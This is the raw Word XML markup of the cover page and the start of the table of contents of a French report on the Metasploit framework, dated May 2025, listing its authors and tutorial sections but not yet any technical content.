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heme="minorHAnsi" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="739677420"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="3A12B9B0" w14:textId="623196BB" w:rsidR="00EE6939" w:rsidRDefault="00EE6939" w:rsidP="00D6524A">
          <w:pPr>
            <w:pStyle w:val="Sansinterligne"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1686FA6E" wp14:editId="5DD817B7">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>3282225</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>-1552393</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="6825343" cy="2841171"/>
                    <wp:effectExtent l="1610995" t="0" r="0" b="259715"/>
                    <wp:wrapNone/>
                    <wp:docPr id="315368643" name="Triangle 7"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm rot="3481972">
                              <a:off x="0" y="0"/>
                              <a:ext cx="6825343" cy="2841171"/>
                            </a:xfrm>
                            <a:prstGeom prst="triangl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4E801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7" o:spid="_x0000_s1026" type="#_x0000_t5" style="position:absolute;margin-left:258.45pt;margin-top:-122.25pt;width:537.45pt;height:223.7pt;rotation:3803242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" fillcolor="red" strokecolor="#030e13 [484]" strokeweight="1pt"/>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B6A57D8" wp14:editId="05DF2D4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2540"/>
                    <wp:wrapNone/>
                    <wp:docPr id="2" name="Groupe 89"/>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FF0000"/>
                            </a:solidFill>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvPr id="3" name="Rectangle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hint="cs"/>
                                    </w:rPr>
                                    <w:alias w:val="Date "/>
                                    <w:tag w:val=""/>
                                    <w:id w:val="-650599894"/>
                                    <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                    <w:date w:fullDate="2025-05-01T00:00:00Z">
                                      <w:dateFormat w:val="dd/MM/yyyy"/>
                                      <w:lid w:val="fr-FR"/>
                                      <w:storeMappedDataAs w:val="dateTime"/>
                                      <w:calendar w:val="gregorian"/>
                                    </w:date>
                                  </w:sdtPr>
                                  <w:sdtContent>
                                    <w:p w14:paraId="655890C3" w14:textId="3B24B7B2" w:rsidR="00EE6939" w:rsidRPr="00CD33BC" w:rsidRDefault="00314E5C" w:rsidP="00D6524A">
                                      <w:pPr>
                                        <w:pStyle w:val="Sansinterligne"/>
                                      </w:pPr>
                                      <w:r>
                                        <w:t>01/05/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a:grpFill/>
                            </wpg:grpSpPr>
                            <wpg:grpSp>
                              <wpg:cNvPr id="6" name="Groupe 6"/>
                              <wpg:cNvGrpSpPr>
                                <a:grpSpLocks noChangeAspect="1"/>
                              </wpg:cNvGrpSpPr>
                              <wpg:grpSpPr>
                                <a:xfrm>
                                  <a:off x="141062" y="4211812"/>
                                  <a:ext cx="1047750" cy="3121026"/>
                                  <a:chOff x="141062" y="4211812"/>
                                  <a:chExt cx="1047750" cy="3121026"/>
                                </a:xfrm>
                                <a:grpFill/>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a:grpFill/>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B6A57D8" id="Groupe 89"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&#13;&#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" adj="18883" filled="f" stroked="f" strokeweight="1pt">
                      <v:textbox inset=",0,14.4pt,0">
                        <w:txbxContent>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:rFonts w:hint="cs"/>
                              </w:rPr>
                              <w:alias w:val="Date "/>
                              <w:tag w:val=""/>
                              <w:id w:val="-650599894"/>
                              <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                              <w:date w:fullDate="2025-05-01T00:00:00Z">
                                <w:dateFormat w:val="dd/MM/yyyy"/>
                                <w:lid w:val="fr-FR"/>
                                <w:storeMappedDataAs w:val="dateTime"/>
                                <w:calendar w:val="gregorian"/>
                              </w:date>
                            </w:sdtPr>
                            <w:sdtContent>
                              <w:p w14:paraId="655890C3" w14:textId="3B24B7B2" w:rsidR="00EE6939" w:rsidRPr="00CD33BC" w:rsidRDefault="00314E5C" w:rsidP="00D6524A">
                                <w:pPr>
                                  <w:pStyle w:val="Sansinterligne"/>
                                </w:pPr>
                                <w:r>
                                  <w:t>01/05/2025</w:t>
                                </w:r>
                              </w:p>
                            </w:sdtContent>
                          </w:sdt>
                        </w:txbxContent>
                      </v:textbox>
                    </v:shape>
                    <v:group id="Groupe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e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" path="m,l39,152,84,304r38,113l122,440,76,306,39,180,6,53,,xe" filled="f"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" path="m,l8,19,37,93r30,74l116,269r-8,l60,169,30,98,1,25,,xe" filled="f"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" path="m,l,,1,79r2,80l12,317,23,476,39,634,58,792,83,948r24,138l135,1223r5,49l138,1262,105,1106,77,949,53,792,35,634,20,476,9,317,2,159,,79,,xe" filled="f"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" path="m45,r,l35,66r-9,67l14,267,6,401,3,534,6,669r8,134l18,854r,-3l9,814,8,803,1,669,,534,3,401,12,267,25,132,34,66,45,xe" filled="f"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" path="m,l10,44r11,82l34,207r19,86l75,380r25,86l120,521r21,55l152,618r2,11l140,595,115,532,93,468,67,383,47,295,28,207,12,104,,xe" filled="f"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" path="m,l33,69r-9,l12,35,,xe" filled="f"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" path="m,l9,37r,3l15,93,5,49,,xe" filled="f"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" path="m394,r,l356,38,319,77r-35,40l249,160r-42,58l168,276r-37,63l98,402,69,467,45,535,26,604,14,673,7,746,6,766,,749r1,-5l7,673,21,603,40,533,65,466,94,400r33,-64l164,275r40,-60l248,158r34,-42l318,76,354,37,394,xe" filled="f"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" path="m,l6,16r1,3l11,80r9,52l33,185r3,9l21,161,15,145,5,81,1,41,,xe" filled="f"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" path="m,l31,65r-8,l,xe" filled="f"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" path="m,l6,17,7,42,6,39,,23,,xe" filled="f"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" path="m,l6,16,21,49,33,84r12,34l44,118,13,53,11,42,,xe" filled="f"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orme libre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" path="m,l41,155,86,309r39,116l125,450,79,311,41,183,7,54,,xe" filled="f" strokecolor="#0e2841 [3215]" strokeweight="0">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" path="m,l8,20,37,96r32,74l118,275r-9,l61,174,30,100,,26,,xe" filled="f" strokecolor="#0e2841 [3215]" strokeweight="0">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" path="m,l16,72r4,49l18,112,,31,,xe" filled="f" strokecolor="#0e2841 [3215]" strokeweight="0">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" path="m,l11,46r11,83l36,211r19,90l76,389r27,87l123,533r21,55l155,632r3,11l142,608,118,544,95,478,69,391,47,302,29,212,13,107,,xe" filled="f" strokecolor="#0e2841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" path="m,l33,71r-9,l11,36,,xe" filled="f" strokecolor="#0e2841 [3215]" strokeweight="0">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" path="m,l8,37r,4l15,95,4,49,,xe" filled="f" strokecolor="#0e2841 [3215]" strokeweight="0">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" path="m402,r,1l363,39,325,79r-35,42l255,164r-44,58l171,284r-38,62l100,411,71,478,45,546,27,617,13,689,7,761r,21l,765r1,-4l7,688,21,616,40,545,66,475,95,409r35,-66l167,281r42,-61l253,163r34,-43l324,78,362,38,402,xe" filled="f" strokecolor="#0e2841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" path="m,l6,15r1,3l12,80r9,54l33,188r4,8l22,162,15,146,5,81,1,40,,xe" filled="f" strokecolor="#0e2841 [3215]" strokeweight="0">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" path="m,l31,66r-7,l,xe" filled="f" strokecolor="#0e2841 [3215]" strokeweight="0">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" path="m,l7,17r,26l6,40,,25,,xe" filled="f" strokecolor="#0e2841 [3215]" strokeweight="0">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" path="m,l7,16,22,50,33,86r13,35l45,121,14,55,11,44,,xe" filled="f" strokecolor="#0e2841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AEA30A2" w14:textId="237069EA" w:rsidR="00EE6939" w:rsidRDefault="00516669" w:rsidP="00D6524A">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CE96140" wp14:editId="1268DFF5">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>3174529</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>2825244</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="2928134" cy="1069848"/>
                    <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                    <wp:wrapNone/>
                    <wp:docPr id="1" name="Zone de texte 93"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr txBox="1"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="2928134"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A7D93" w14:textId="0BBC0E94" w:rsidR="00EE6939" w:rsidRPr="005D15E0" w:rsidRDefault="005D15E0" w:rsidP="00FC47DF">
                                <w:pPr>
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    <w:sz w:val="80"/>
                                    <w:szCs w:val="80"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    <w:sz w:val="80"/>
                                    <w:szCs w:val="80"/>
                                  </w:rPr>
                                  <w:t>Le Framework</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="05321523" w14:textId="26155BD5" w:rsidR="00C86E87" w:rsidRPr="005D15E0" w:rsidRDefault="00C86E87" w:rsidP="00FC47DF">
                                <w:pPr>
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    <w:sz w:val="80"/>
                                    <w:szCs w:val="80"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="005D15E0">
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    <w:sz w:val="80"/>
                                    <w:szCs w:val="80"/>
                                  </w:rPr>
                                  <w:t>Metasplo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CE96140" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="rect"/>
                  </v:shapetype>
                  <v:shape id="Zone de texte 93" o:spid="_x0000_s1055" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:249.95pt;margin-top:222.45pt;width:230.5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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                      <w:txbxContent>
                        <w:p w14:paraId="0D1A7D93" w14:textId="0BBC0E94" w:rsidR="00EE6939" w:rsidRPr="005D15E0" w:rsidRDefault="005D15E0" w:rsidP="00FC47DF">
                          <w:pPr>
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              <w:sz w:val="80"/>
                              <w:szCs w:val="80"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              <w:sz w:val="80"/>
                              <w:szCs w:val="80"/>
                            </w:rPr>
                            <w:t>Le Framework</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="05321523" w14:textId="26155BD5" w:rsidR="00C86E87" w:rsidRPr="005D15E0" w:rsidRDefault="00C86E87" w:rsidP="00FC47DF">
                          <w:pPr>
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              <w:sz w:val="80"/>
                              <w:szCs w:val="80"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="005D15E0">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              <w:sz w:val="80"/>
                              <w:szCs w:val="80"/>
                            </w:rPr>
                            <w:t>Metasploit</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="003029A2">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="097CDF95" wp14:editId="325AE62D">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>4134678</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>9395791</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="3657600" cy="744297"/>
                    <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
                    <wp:wrapNone/>
                    <wp:docPr id="32" name="Zone de texte 91"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr txBox="1"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="3657600" cy="744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63EBD" w14:textId="6751B768" w:rsidR="00EE6939" w:rsidRPr="00FC47DF" w:rsidRDefault="00EE6939" w:rsidP="00FC47DF">
                                <w:pPr>
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:sz w:val="48"/>
                                    <w:szCs w:val="48"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00FC47DF">
                                  <w:rPr>
                                    <w:rFonts w:hint="cs"/>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:sz w:val="48"/>
                                    <w:szCs w:val="48"/>
                                  </w:rPr>
                                  <w:t>MUSTAFA Dolunay</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="1030A6DE" w14:textId="2F88E23B" w:rsidR="003029A2" w:rsidRPr="00FC47DF" w:rsidRDefault="003029A2" w:rsidP="00FC47DF">
                                <w:pPr>
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:sz w:val="48"/>
                                    <w:szCs w:val="48"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00FC47DF">
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:sz w:val="48"/>
                                    <w:szCs w:val="48"/>
                                  </w:rPr>
                                  <w:t>DEVIN Pierre-Emmanue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097CDF95" id="Zone de texte 91" o:spid="_x0000_s1056" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:325.55pt;margin-top:739.85pt;width:4in;height:58.6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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox inset="0,0,0,0">
                      <w:txbxContent>
                        <w:p w14:paraId="22863EBD" w14:textId="6751B768" w:rsidR="00EE6939" w:rsidRPr="00FC47DF" w:rsidRDefault="00EE6939" w:rsidP="00FC47DF">
                          <w:pPr>
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00FC47DF">
                            <w:rPr>
                              <w:rFonts w:hint="cs"/>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                            </w:rPr>
                            <w:t>MUSTAFA Dolunay</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="1030A6DE" w14:textId="2F88E23B" w:rsidR="003029A2" w:rsidRPr="00FC47DF" w:rsidRDefault="003029A2" w:rsidP="00FC47DF">
                          <w:pPr>
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00FC47DF">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                            </w:rPr>
                            <w:t>DEVIN Pierre-Emmanuel</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="004278BA">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657214" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0757E813" wp14:editId="14C0B624">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>-4344277</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>7505700</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="6864878" cy="2411565"/>
                    <wp:effectExtent l="0" t="1828800" r="69850" b="0"/>
                    <wp:wrapNone/>
                    <wp:docPr id="899580699" name="Triangle 7"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm rot="12992375">
                              <a:off x="0" y="0"/>
                              <a:ext cx="6864878" cy="2411565"/>
                            </a:xfrm>
                            <a:prstGeom prst="triangl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46B32" id="Triangle 7" o:spid="_x0000_s1026" type="#_x0000_t5" style="position:absolute;margin-left:-342.05pt;margin-top:591pt;width:540.55pt;height:189.9pt;rotation:-9401822fd;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" fillcolor="red" strokecolor="#030e13 [484]" strokeweight="1pt"/>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="00EE6939" w:rsidRPr="003029A2">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="FF0000"/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656189" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="346C86ED" wp14:editId="61C56E73">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>2039348</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>464275</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="3363686" cy="3304177"/>
                    <wp:effectExtent l="0" t="0" r="14605" b="10795"/>
                    <wp:wrapNone/>
                    <wp:docPr id="1360578444" name="Rectangle : coins arrondis 8"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="3363686" cy="3304177"/>
                            </a:xfrm>
                            <a:prstGeom prst="round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8CB2B" id="Rectangle : coins arrondis 8" o:spid="_x0000_s1026" style="position:absolute;margin-left:160.6pt;margin-top:36.55pt;width:264.85pt;height:260.1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" fillcolor="red" strokecolor="#030e13 [484]" strokeweight="1pt">
                    <v:stroke joinstyle="miter"/>
                  </v:roundrect>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="00EE6939">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
          <w:r w:rsidR="00F21762">
            <w:lastRenderedPageBreak/>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F21762">
            <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/ed/56/ed/ed56ed9b-4b28-9fc7-b9b6-febea32daa32/AppIcon-0-0-1x_U007epad-0-1-85-220.png/1200x600wa.png" \* MERGEFORMATINET </w:instrText>
          </w:r>
          <w:r w:rsidR="00F21762">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00F21762">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r w:rsidR="00F21762" w:rsidRPr="00F21762">
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00F21762">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F21762">
            <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://passionnement-organisee.fr/wp-content/uploads/2024/08/image-de-Vinted.jpg" \* MERGEFORMATINET </w:instrText>
          </w:r>
          <w:r w:rsidR="00F21762">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00F21762">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1062858499"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="343215BB" w14:textId="27AC8306" w:rsidR="00326B4B" w:rsidRPr="003F695F" w:rsidRDefault="00326B4B" w:rsidP="00205BC0">
          <w:pPr>
            <w:pStyle w:val="En-ttedetabledesmatires"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
            <w:rPr>
              <w:rStyle w:val="TitreCar"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="003F695F">
            <w:rPr>
              <w:rStyle w:val="TitreCar"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>Table des matières</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="57C96408" w14:textId="202556EA" w:rsidR="009C5AE7" w:rsidRPr="004459DB" w:rsidRDefault="009C5AE7" w:rsidP="00D6524A"/>
        <w:p w14:paraId="748FE06A" w14:textId="58A0FE35" w:rsidR="00D22572" w:rsidRDefault="00230DCA">
          <w:pPr>
            <w:pStyle w:val="TM1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="004459DB">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="004459DB">
            <w:instrText xml:space="preserve"> TOC \o "1-2" \h \z \u \t "Titre 4;3" </w:instrText>
          </w:r>
          <w:r w:rsidRPr="004459DB">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc197957002" w:history="1">
            <w:r w:rsidR="00D22572" w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Présentation et Explication de Metasploit</w:t>
            </w:r>
            <w:r w:rsidR="00D22572">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D22572">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D22572">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957002 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D22572">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D22572">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D22572">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D22572">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EA136A5" w14:textId="0EA83FDC" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957003" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>I.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Suivi, test et détail du tutoriel :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957003 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
